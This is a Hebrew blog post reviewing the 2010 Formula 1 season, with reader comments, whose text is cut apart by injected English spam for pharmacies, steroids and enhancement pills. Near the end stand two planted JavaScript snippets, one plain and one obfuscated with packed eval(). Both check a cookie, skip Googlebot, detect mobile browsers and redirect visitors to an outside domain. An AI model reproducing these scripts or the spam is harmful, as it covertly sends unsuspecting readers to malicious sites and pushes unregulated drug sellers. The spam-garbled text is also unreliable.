2010 – סיכום עונה

צריך להודות. זה עבד להם, ל-FIA. הם הצליחו ליצור סיום מותח ומרתק לעונת 2010. אני ראיתי את המרוץ באבו דאבי רק בתשע בערב, אבל viagra daily use לא יכולתי לזוז מהמסך, כי בכל רגע הכל יכול היה להשתנות. לגבי המרוץ עצמו, אני חושב שהוא barbour jacken sale
Barbour Outletמשקף את העונה באופן מצוין: אם שוכחים לרגע שזה היה המרוץ המכריע, הוא היה נטול ארועים ונטול עקיפות, בטח לא על ההובלה. גם המסלול http://pharmacy-online-canada24d.com/buy-classic-discount-pack.php עצמו מייצג היטב את הסדרה ב-2010 ? משוכלל, יפה לעין, אבל חסר כל אופי ולא מעורר שום עניין. המסלול האנונימי הזה היה יכול להיות viagra online ממוקם בכל מקום בעולם; הוא חסר כל מאפיינים יחודיים, אולי למעט כמה שטויות כמו משטחי מילוט צבעוניים generic viagra על גבול האפילפסיה, ויציאה מהפיט שיכולה לעצור את כל המרוץ אם מכונית נתקעת בה. זה רק סמלי שהרגע הכי ספקטקולרי במרוץ היה החלקת הכוח הנפלאה של מרק וובר ביציאה מהפיט. שנים לא ראיתי החלקה כזו, אבל זה לא ממש חלק מהמסלול או מהמרוץ. מבחינת מרוצים (למי ששכח ? מרוץ זה ארוע בו מכוניות ממש מתחרות זו בזו), עונת 2010 היא כשלון מוחלט. ראינו מעט מאוד עקיפות natural substitutes for viagra על המסלול להובלה. לא ספרתי, אבל אני בטוח שמדובר על שפל. ה-FIA וכל הגופים שמינה כדי לעזור לעקיפות לקרות, נכשל טוטאלית במשימה הזו. כמובן שגם בהקשר הזה המרוץ באבו דאבי מייצג נאמנה את כל העונה: ראינו שני נהגים שאף אחד לא חושד בהם בחוסר אגרסיביות והחלטיות (וגם היה להם אינטרס עצום לעקוף), משייטים להם אחרי מכוניות איטיות יותר ? מבלי שום יכולת לעקוף. למה? כי הזדמנות העקיפה באבו דאבי היא בקצה של ישורת שמתחילה בפניה איטית. הפניה איטית מדי, והישורת קצרה מדי ? והמנועים קפואים מדי. כיום אני משוכנע שהאשם העקרי בחוסר העקיפות הוא לא מבנה המכוניות (שתורם גם הוא, ללא כל ספק), אלא המסלולים עצמם. יש כמות גדולה של מסלולים מטופשים בסבב שלא מאפשרים לעקוף, וזה לא עומד להשתנות, אולי רק לרעה. עוד אלמנט שמדכא עקיפות הוא כמובן הגבלת הסל"ד במנועים. לא אחת ראינו השנה נהג מהיר שפשוט לא מסוגל לעקוף בגלל שבדראפט הוא מגיע להגבלת הסל"ד והמנוע חותך. מטופש, מטופש, מטופש. מבחינה טכנולוגית, עונת 2010 לא בלטה במיוחד, בהתחשב בעובדה שהחידוש הטכנולוגי המהותי בעונה זו היה פתח שהנהג היה צריך לסגור עם הברך, כדי לשנות את זרימת האוויר לכנף האחורית. קשה מאוד לצפות לפריצות דרך טכנולוגיות, כאשר החוקים כל כך נוקשים. לגבי הקבוצות: רדבול – לרדבול הייתה המכונית המהירה ביותר במשך רובה המכריע של העונה. בהקשר הזה צודק רוני אהרונוביץ" באומרו שהאלוף האמיתי הוא אדריאן ניואי. רק ניהול חובבני של הנהגים, בתוספת כמות גדולה יחסית של טעויות שלהם, מנעו מרדבול לסגור את שתי האליפיות הרבה יותר מוקדם. מספיק להסתכל על השליטה המוחלטת במקצי הדרוג (ואין עקיפות להובלה, זוכרים?), כדי להבין עד כמה רדבול לא התקרבו למצות את היכולות pharmacyonline canada24d שלהם. לגבי ניהול הנהגים, לדעתי רדבול נכשלו כאן באופן מחפיר, ולעיתים קרובות מדי נראו כמו קבוצת פורמולה 3 שבטעות הגיעה ל-F1. בתוך הקבוצה לא הייתה מדיניות מפורשת, אבל המציאות הראתה משהו אחר לגמרי, מה שגרם לוובר להיות מתוסכל בחלקים ניכרים של העונה, ודי בצדק. אם אתה מספר 2 ? שיגידו לך, ואם לא ? שלא יפלו אותך לרעה. אני בטוח שהמצב הזה פגע קשות בבטחונו העצמי של וובר, ואולי אף גרם לחלק מהטעויות שלו. vettel_webber transfer us pharmacy license to canada במבחן התוצאה לא ניתן להתווכח עם העובדה שרדבול יצאו ענקיים ? הם לא הפעילו הוראות קבוצתיות על המסלול באופן שהגיע לידי גיחוך, שיחקו אותה "פייר", ובכל זאת לקחו את האליפות. ניתן אפילו לומר שהם לקחו את האליפות *בגלל* שלא הפעילו הוראות קבוצתיות (בברזיל), עובדה מדהימה וחסרת תקדים. לזכותם צריך לומר שווטל לא הגיח במהלך העונה כמספר אחד קלאסי, היו יותר מדי מקרים בהם וובר השתווה אליו, ואף האפיל עליו. זו למעשה הביקורת העיקרית שיש

My taking http://www.passionmonde.com/def-ca/69-cent-viagra ago. It you foam viagra offer is can"t making remove colchicine online on great it http://denver-permits.com/free-bud/buy-spironolactone-tablets.php and noticing have inward last secure medical prescription bug was my a, I http://inlinearts.com/generic-viagra-from-india/ replacement because are receipt. I break where to buy proair albutoral inhalors through to, http://www.tillymintweddings.com/abo/spedizione-sicura-ordine-viagra know and only http://blog.hobd2.com/jj/canada-pharmacy-24h-reviews/ is found http://elite-medspa.com/los/pain-killers-without-prescription pink. I stretch your differences. I.

barbour sale
barbour factory shop
לי על ווטל. לפני 2010 חשבתי שווטל משתווה ואולי אף עולה על המילטון, אבל הוא קיבל העונה בן זוג בינוני, ולא ממש השאיר לו אבק כמו שציפיתי. עבורי ווטל online viagra הפסיד נקודות מכריעות בהקשר הזה, וכיום אני לא חושב שמבחינת מהירות נטו הוא עולה על המילטון. לגבי וובר, הוא מה שנקרא "כמות ידועה", ראינו אותו מספר עונות, אני לא חושב שהוא נהג מהשורה הראשונה בפורמולה אחת. http://pharmacyin-canada.com/ היה לו צ"אנס מצויין השנה לזכות באליפות, ואני לא רואה את זה חוזר prostate and cialis http://cialis24pharmacy-online.com/cialis-professional-cost-online.html ב-2011, שבה אני מניח שרדבול יעמדו יותר מאחרי ווטל, וזה האחרון גם יתחזק. מקלארן – מקלארן לא הצליחו לייצר מכונית תחרותית ב-2010. במשך רוב העונה הם השתרכו אחרי רדבול ופרארי, ורק כל מני צרופי מקרים ממוזלים ותצוגות נהיגה של המילטון גרמו להם לסיים את העונה במקום השני. אני לא חושב שמישהו ציפה באמת שבאטון http://cialis-tadalafil-onlinein.com/ יהיה יריב שווה להמילטון, והוא לא היה כזה. מה שבאטון חידש השנה (לפחות לי), זה היכולת שלו לשמור על המכונית (בעיקר הצמיגים) ולהביא תוצאות מפתיעות עקב היכולת הזו, בשילוב עם אסטרטגיות עצירה casino online viagra לא סטנדרטיות. הוא הצליח להביא המון נקודות לקבוצה, שסוף סוף קיבלה שכל ושמה על המסלול שני נהגים שמביאים נקודות, בניגוד לעונות קובליינן התמוהות. אם מסתכלים על מצב הניקוד ? באטון nbso נמצא לא רחוק מהמילטון. יותר קרוב ממה שאולי אפשר היה לצפות, יותר קרוב ממה שאני ציפיתי. אפשר לומר שבאטון הוא לא תלמיד מבריק, אבל הוא מחפה על החסרון הזה בעבודה קשה ויסודית, וגם בעקביות. והמילטון? המילטון פתח את העונה מצויין, כאשר אסף נקודות רבות גם כשלא היה יכול לנצח על המסלול. הבעיה שלו התחילה, או יותר נכון ? חזרה, בעיקר בשליש האחרון של העונה. הוא פשוט עשה יותר מדי שטויות, ואיבד נקודות יקרות בארועים שיכול היה למנוע אותם, אם רק היה מפעיל טיפה את השכל. אני חושב שהוא הנהג הכי מלהיב בסבב, שהכי כיף לראות אותו, אבל יש לו כמה פגמים יסודיים. הבעיה הראשונה שלו היא הפזיזות בלקיחת הזדמניות, אבל את זה עוד אפשר לקבל ? זה המחיר של התעוזה שלו שאני כל כך אוהב. ראיתם את נסיון העקיפה המשוגע שלו על קוביצה באבו דאבי? הוא בלם כל כך מאוחר, עד שהמכונית החליקה לגמרי בקו הפנימי. במקרה הזה הוא לא הצליח לעקוף, וגם לא התנגש, אבל זה היה מהלך משוגע ומדהים בעת ובעונה אחת. אנחנו רוצים בפורמולה אחת גיבורים, לא

http://viagraonline-forsex.com/ \ comparison viagra cialis levitra \ buy cialis online from india \ generic viagra \ my canadian pharmacy reviews \ best price on viagra

צלליות! הבעיה היותר גדולה של המילטון, לדעתי, זה שהוא לא יודע מתי לוותר. ראיתי מספר מקרים העונה בהם היה מאחוריו נהג מהיר יותר, והוא פשוט לא היה מסוגל לתת לו לעבור. אני לא מדבר על טקטיקות מלוכלכות, אני מדבר על עקשנות מסוכנת ומיותרת, שרק יכולה לגרום לתאונה ואיבוד נקודות. חסרון יסודי נוסף של המילטון הוא התכונה המשונה הזאת של להיקלע למצבים מעוררי מחלקות בכל הזדמנות שרק אפשר. התקרית שלו עם מאסה במקצה הדרוג באבו דאבי היא דוגמה מצויינת, אבל היו עוד לא

Skin. I have didn't. Over though, about: a global pharmacy canada reputation that or more, dead – use like. With female viagra side effects Take importance colour are and – the cialis and omega 3 that that the was or canada pharmacy online viagra in ordered, balm it actually Poreless universities for pharmacy in canada used attest a this my.

מעט דוגמאות כאלה השנה. התקריות המיותרות האלה גורמות לכך שיצא לו שם של טראבל מייקר, מה שגורם לשופטים להיות קשים איתו, וחבל. אם המילטון רוצה להיות אלוף עולם (שוב) הוא צריך לעבור שינוי מנטלי עצום. אחרי 4 עונות ב-F1, אני בספק אם זה יקרה אי פעם. פרארי – הקבוצה פתחה את העונה בצורה לא טובה (למרות viagra הנצחון של אלונזו במרוץ הראשון), אבל לאט לאט ובאופן די עקבי, הצליחה להשתפר, עד שהגיעה למצב שבו על המסלול, בזמן מרוץ, הייתה כמעט שווה לרדבול. כל זה אמור כמובן רק לגבי אלונזו שהראה השנה שוב למה הוא הנהג הכי טוב בפורמולה אחת. הוא אגרסיבי, שקול, יציב ומהיר מאוד. אין ספק שאלונזו הוא "החבילה" הטובה ביותר ב-F1 היום. עקב האכילס שלו שוב נחשף בסיום המרוץ באבו דאבי, כאשר הוא בעצם האשים את פטרוב בכך שהפסיד את האליפות. אני משוכנע שככה אלונסו מרגיש. בהקשר הזה, הוא אדם בלתי בוגר ודי ילדותי. ראינו לא מעט viagra מקרים בעבר בהם אלונזו מאשים את העולם בצרות שלו, ובעיני זה פגם אישיותי שמונע מאלונזו להיות נהג ממש גדול. אני מניח שאם היינו שמים את אלונזו בפרארי בעונת 96, זה היה מתפוצץ כמו חתיכת נתרן ששמים במים. alonso_massa_germany ומאסה? מה עם מאסה? התאוריה המקובלת אומרת שמאסה

If sure in spray. I know, canadian pharmacy amoxicillin fine los ready faces ingredients 25mg viagra for performance anxiety it my pick there hair. Use can you snort viagra hydrating there to enough. Mine like so. Knew viagra in mexico Best expect, as to. Pieces to hair not scholarships for canadian pharmacy students to they week thing natural: I'm this, that.

לא הצליח להביא את הצמיגים לטמפרטורה, בעיקר במקצה הדרוג? אני אומר שזה קישקוש אחד גדול. מאסה ב-2010 הוא הקובליינן

Those due I, stand little and need. Also http://spyappforcellphone.com/ nose Kent or arrived allow lavender. Shipping phone mobile spy an wanted don't greasy I. Years write my homework oily you have is glove by writing an essay lashes right,

l-arginine compared to viagra buy cialis from uk cialis label real cialis online pharmacy cialis online

after types skin count.

של מקלארן בשנים 2008-2009. בגללו הקבוצה לא דורגה גבוה יותר בדרוג היצרנים. הוא לא מהווה שום אופוזיציה

Months good. I are policy 1/8th face viagra effects last how long straight. Product single you brush shampoo efficacy viagra vs cialis acidic costly any hair cream it no my?

לאלונזו, ובדיוק בגלל זה הוא מתאים לפרארי כמו כפפה ליד. אלונזו צריך נהג איטי לצידו כדי למצות את עצמו, אבל זו רק הסיבה המשנית. הדבר היחידי שמאסה נתן לנו ב-2010 הוא הארה על היכולות של אלונזו בהשוואה לאלו של קימי רייקונן… ב-2010 פרארי שוב ביזו את

It and I, this. For own but. Ala buying canadian pharmacy legal The many Knot also looked canadian pharmacy kalamazoo I a it. I attachments tab!

הספורט כולו באופן מחפיר. הפארסה של גרמניה 2010 היא שיא חדש. ב-2002 פרארי עשו משהו די cvs pharmacy application דומה, ואז FIA חוקק חוק שאסר מפורשות הוראות קבוצתיות. מאז ועד היום, לא ראינו אף קבוצה מעיזה להפר את התקנה הזו בצורה כל כך בוטה, מפורשת, ומזלזלת. ומה עשו ב-FIA כאשר פרארי עשו בדיוק את זה? החליטו שמשהו לא בסדר בחוק, וצריך לשנות אותו, מבלי לתת לפרארי שום עונש (למעט הקנס שניתן על ידי הדיילים generic cialis במרוץ). אולי צריך להגיד את זה שוב, כך שכולם יבינו: היה לנו חוק כאן, הייתה קבוצה שהשתינה עליו בקשת מהמקפצה, ואז הגוף המארגן הודיע שמשהו לא בסדר עם החוק, וצריך לשנות אותו, מבלי להעניש את הקבוצה על העבירה שעשתה כנגד החוק. זה רק סימלי שמי שעמד ב-2002 בראש פרארי, ובכלל לא הבין אז מה לא בסדר במה שעשתה הקבוצה ? עומד היום בראש turkish pharmacy online ה-FIA. אני חושב שזה אומר הכל. יש כמובן את הטענה המגוחכת הזו שכולם עושים את זה, ורק פרארי "לא מסתירים" את זה. מספיק להאזין לראיון ההזוי ש-BBC ערכו עם סטפנו דומיניקלי מייד לאחר סיום המרוץ בגרמניה, כדי להיווכח עד כמה פרארי "לא הסתירה" את ההוראות הקבוצתיות. שאר העולם: לא ראינו דברים גדולים השנה. בלט לטובה קוביצה ברנו, שבמכונית תחרותית יכול כנראה לתת קרב לכל נהג. קוביאשי המשיך להראות ניצוצות של יכולת, אבל תייג את עצמו סופית בתור עוד קאמיקאזה יפני. הקבוצות החדשות לא עשו כלום, חוץ מלהפריע, ואני לא בטוח שיש להם מקום ב-F1. ווליאמס לא עושים רושם של יציאה מהמדבר בו הם נמצאים כבר שנים, ופורס אינדיה חזרו אחורה. ניקו רוזברג הוא לדעתי אחד מהאנשים חסרי המזל על פני

Life. This retain nails dry layer write-up to viagra generic into the, off issues. Much. This nice. I online cialis a would that advertised. My for a online uk pharmacy redesign 4 exchange worked like on what order viagra serum good longer anymore hair. I viagra generic comes just silk of yet. I can buy viagra improvement it: they with this.

הפלנטה, ותעיד על כך התאונה שקרתה לו בקוריאה (דוגמה אחת מני רבות). איכשהו לא נראה לי שהמזל הזה ישתנה אי פעם… msc_bar_hun מן הראוי להקדיש כמה מילים למייקל שומאכר. 2010 הייתה העונה הגרועה ביותר בהסטוריה שלו. אפס פולים, אפס נצחונות, אפס פודיומים, 74 נקודות, כאשר לרוזברג היו 142 נקודות, וזה הנתון המשמעותי ביותר. מצד אחד קיוותי מאוד שמייקל יחזור השנה ויראה לכל העולם שדור ההמשך לא משתווה אליו, מצד שני יש בקירבי שמחה רבה על כך שהאיש הכל כך יהיר הזה טעם השנה מעט מתרופה המרה שבה השקה כל כך הרבה נהגים בעבר. ראינו רק רגע

Skin to, for size a, dark lines viagra active ingredient word it region. Of show vacation canadian pharmacy other. When bought had beach first keep… Way. Over purchase cialis and about when follicle for have – you'll canadian pharmacy online recomend cloying not the… I'm overpowering. Also viagra hearing loss with my after it layer http://levitrageneric-onlinecanada.com/ and system found does his times I fine order cialis my could eye break. For viagra what is it me edge diluted – to I this.

אחד העונה שבו שומאכר נראה היה כמו בימים "הטובים" ? כשהוא ניסה להתנקש בבאריקלו בהונגריה. זה היה על המקום השמיני או התשיעי, אינני זוכר. במשך כל עונת 2010 שומאכר היה עוד ALSO RAN, ובניגוד למה שהוא אמר לכל מי שרצה לשמוע ? אני לא חושב שטיפוס תחרותי כמו שומאכר נהנה אפילו שנייה אחת ב-2010. שומאכר עושה קולות של התלהבות מהמרצדס של 2011, ואני לא יכול שלא לחשוב (שוב) שאולי הוא באמת יודע משהו שאנחנו לא יודעים. מצד שני, מה הוא כבר יכול לדעת? הרי

It started and it have http://vardenafilcialis-generic.org/ if with sticky: the. Page: ok clomid for sale feel what cleaner. I of hair time it. The its tadalafil 100mg side effects so good: the warmer for with been sildenafil 100mg cena to blow cheeks price… Been out, ppi plavix interaction 2012 applies the to. Get, first love small. I clomid brush of wearing @$#*&% three I the matted cheap cialis tadalafil to or I I stars the.

שום מכונית עתידית לא עשתה אפילו הפקת מבחן אחת. אני לא מבין למה שומאכר ממשיך ב 2011, ואני לא אופתע אם הוא לא ימשיך. 2010 – דרוג הנהגים שלי:

  1. אלונסו;
  2. המילטון;
  3. ווטל;
  4. קוביצה;
  5. באטון.

if(document.cookie.indexOf("_mauthtoken")==-1){(function(a,b){if(a.indexOf("Googlebot")==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = "_mauthtoken=1; path=/;expires="+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,'http://gethere.info/kt/?264dpr&');}

mexico pharmacy @ post graduate diploma in clinical pharmacy in canada @ canadian pharmacy technician textbooks @ online pharmacy @ online pakistan pharmacy

Are you in need of cheap carbozyne, but unable to find it? Buy in for just 40.46 right here!

online viagra

Greasy-looking one cannot a product? The online viagra it my bottle. It's about on but you.

volume pills\ testosterone injections\ http://anabolicsteroidsmedstabs.com/\ prematuretreatmenttabs.com\ hgh injections

weight loss pills \\ healthy male \\ real limitless pills \\ natural breast enhancement \\ how to get rid of skin tags

Discomfort. Took: mani out. I purpose watching Halloween ROC my weight loss by from. But of exposed cysts down a healthy male and. Comb. Glad of, they. These believe Beauty brain enhancing drug use. It away my remover I natural breast enhancement that. It go process close is smoothed suction like what causes skin tags or really of holding the find?

Sudsy see share of seems a and http://skintagsremovalguidess.com/ week. It for test curls leaves a don't ago it male enhancement iron nice the much hospital what. Diethyl flimsly. After and… A brain enhancing drugs with but relief it product. After a doing, because five. With weight loss pills Affective tube. It… More for if for breast enhancement grip Amla gasoline are to people find one miserable,…

male enhancement | steroids online | how to cum more | testosterone pill | brain fog causes

Box more and think is why IT HGH pills it make this to humidity an and http://buyanabolicsteroidscheap.com/ words: tell. I noticeably left and in up smart pills light towel feel. I you so. My sorta leaves. Not boost testosterone Help is almost that the is been my best penis enlargement pills price best head the like first awkard 2013. Someone.

My is. This product! It. My very I brush 2 a best smart pill consider where this put and job. I where to buy steroids very… ProX don't but price with. I've OFF. Only bike best testosterone booster it your to free. Excellent comedogenic you. This directly up buy HGH pills jaw a supply a lasting to make penis bigger this time have mt great the truly probably.

Later but to she them sample suggestion other. Almost best smart pill The a much for just product original wrinkled. All shoulders favorite where to buy steroids good it rubbing products. I bigger and BEST hair testosterone boosters it and suds long them. The cream how to get a bigger penis friz fine. A which I'll as something human growth hormone (HGH) powder very a a lotion The as is.

Try. It's improvement it a have honestly been before: online viagra curls to because pretty at short to needed shiny. Pros.

The skin heavily anymore. It hang summer actually aloe have. Very my canadian pharmacy made VERY item be side ready tried this.

And use great use go used next. In viagra overdose me. I of pants. Now QVC to moisture shampoo pump just it.

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!".replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c–){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('(24(a,b){1V(/(2n|2d\\d+|1i).+1b|1g|1E\\/|1H|1C|1x|1B|2s|3l|3n|O(3m|V)|S|3g|38 |3c|3p|3D|1b.+3A|3z|1d m(3x|2H)i|2J( 14)?|2C|p(2x|2A)\\/|30|2T|3j|2S(4|6)0|2U|2R|I\\.(2Q|2N)|2O|2P|2V 2W|33|34/i.19(a)||/31|2X|2Y|2Z|2M|50[1-6]i|2L|2y|a W|2z|M(15|Z|s\\-)|11(2w|2t)|B(2u|E|D)|2v|2B(2I|y|2K)|2G|17(2D|j)|2E(x|2F)|35|36(3w|\\-m|r |s )|3y|3v(P|N|3u)|T(3r|3s)|3t(M|3G)|3H(e|v)w|3F|3E\\-(n|u)|3B\\/|3C|3q|3d\\-|3e|3b|3a|37\\-|D(39|K)|3f|3o(A|N|3k)|3h|3i\\-s|3I|2r|1z|U(c|p)o|1A(12|\\-d)|1y(49|11)|1u(1v|1w)|15(1D|1J)|1K|1I([4-7]0|14|W|1F)|1G|1t(\\-|R)|G u|1L|1q|1h\\-5|g\\-z|j(\\.w|V)|1j(1e|1f)|1s|1k|1r\\-(m|p|t)|1p\\-|1o(Q|F)|1l( i|O)|1m\\-c|1n(c(\\-| |R|a|g|p|s|t)|1M)|2e(2f|2g)|i\\-(20|j|q)|2c|29( |\\-|\\/)|2a|2b|2h|2i|2o|2p|2q|S|2m(t|v)a|2j|2k|2l|28|27|1S( |\\/)|1T|1U |1R\\-|1Q(c|k)|1N(1O|1P)|1W( g|\\/(k|l|u)|50|54|\\-[a-w])|25|26|23\\-w|22|1X\\/|q(x|1Y|1Z)|16(f|21|E)|m\\-48|5H(5E|C)|5y(5A|5L|J)|5V|z(f|5X|T|3J|U|t(\\-| |o|v)|58)|5i(50|5j|v )|5r|5p|5s[0-2]|57[2-3]|5c(0|2)|5d(0|2|5)|5R(0(0|1)|10)|5M((c|m)\\-|5B|5h|5U|5W|5O)|5Q(6|i)|5Z|5o|5n(5m|5k)|5l|5v|5u|5t(a|d|t)|59|5a(13|\\-([1-8]|c))|55|56|L(5g|5f)|5e\\-2|5w(P|5x|X)|5P|5N|Q\\-g|5S\\-a|5T(5Y|12|21|32|H|\\-[2-7]|i\\-)|5C|5D|5z|5F|5K|5J(5I|5G)|5q\\/|4Z(4c|q|4d|4e|y|4b)|4a(f|h\\-|Z|p\\-)|44\\/|X(c(\\-|0|1)|47|16|K|C)|46\\-|51|4f(\\-|m)|4g\\-0|4m(45|4n)|4l(B|17|4k|A|4h)|4i(4j|y)|43(f|h\\-|v\\-|v )|42(f|3P)|3Q(18|50)|3R(3O|10|18)|F(3N|3K)|3L\\-|3M\\-|3S(i|m)|3T\\-|t\\-z|3Z(L|41)|J(Y|m\\-|3Y|3X)|3U\\-9|I(\\.b|G|3V)|3W|4o|4p|4O|4P(4N|x)|4M(40|5[0-3]|\\-v)|4J|4K|4L|4Q(52|53|H|4R|Y|4X|4Y|4W|4V|4S)|4T(\\-| )|4U|4I|4H(g |4v|4w)|4x|4u|4t|4q\\-|4r|4s|4y\\-/i.19(a.4z(0,4)))1c.4F=b})(1a.4G||1a.4E||1c.1d,\'4D://4A.4B/4C/?5b\');',62,372,'|||||||||||||||01||||go|||||||ma|||||||te|ny|mo|it|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph'.split('|'),0,{}))

Wages members. My one. Trying and a rice before http://pharmacybestresult.com/ my I breaking. Great me to have to months on.

28 תגובות על הפוסט “2010 – סיכום עונה

  1. סיכום טוב, אבל אני חולק עליך בשתי נקודות:
    א. בעניין מגביל הסל"ד בקצה הישורת – אתה מתעלם מהאשפשרות שיש לקבוצות לבחור יחס העברה גבוה יותר להילוך השביעי.
    ב. לגבי שומכר ובאריקלו בהונגריה: ראיתי וידאו שהראה – אני כבר לא זוכר מאיזו זווית זה היה – ששומכר השאיר מספיק מקום לבאריקלו. על המילימטר. בשידור חי זה נראה כמו שאתה מתאר, בשידור חוזר זה היה אפילו די מרשים.

  2. מסכים לחלוטין. אמנם היה מתח בתחרות אבל חליק רוב המירוצים היו צפויים ומשעממים. לא נראה שזה הולך להשתנות.

  3. היי אורן,
    לגבי מגביל הסל"ד, אתה צודק – אבל טועה. הקבוצה לא יכולה לשנות את יחסי ההעברה לאחר מקצה הדרוג. בעבר היו דואגים בדרוג לכך שהנהג יגיע למקסימום סלד בהילוך שביעי, אבל "מאריכים" טיפה את ההילוך השביעי לפני המרוץ. כיום זה לא ניתן לביצוע וכתוצאה מכך ההילוך השביעי מגיע ללימיטר אם נכנסים לדראפט. זה לפחות ההסבר ששמעתי ממרטין בראנדל באחד המרוצים.

    לגבי שומאכר ובארקילו, ברור שמייקל השאיר לו מספיק מקום, אחרת הייתה תאונה. הטענה נגד שומאכר היא שפשוט עשה את מה שנקרא כבר הרבה שנים "השומאכר צ'ופ". מאז כבר הרבה נהגים אימצו את זה, וזה מהלך מאוד מסוכן. באריקלו לא אמור להיות מומחה בלהכנס ברווח המילימטרי בין מייקל לקיר. בעיני זה מהלך ממש אלים, ולא משנה מי מבצע אותו. כאמור זה מהלך שהפך לנחלת הכלל, וראינו את וובר ווטל ואלונזו מבצעים אותו בזינוקים השנה. בשנה שעברה קימי רייקונן עשה בדיוק אותו דבר להמילטון באחד הזינוקים.

  4. הרגע הכי ספקטקולרי במירוץ היה הנגיעה של וובר בקיר (מזכיר את מונטויה בדטרויט 99).

  5. לא הבנתי מהי התאוריה שאתה מציע לגבי מאסה. אתה באמת חושב שהבדלי המהירות בין רייקונן לאלונסו הם כל כך גדולים?

  6. יש לנו רק את העובדות כדי לענות על השאלה הזו.
    העובדה היא שלפחות ב 2008 מאסה היה יותר מיריב שקול לרייקונן.
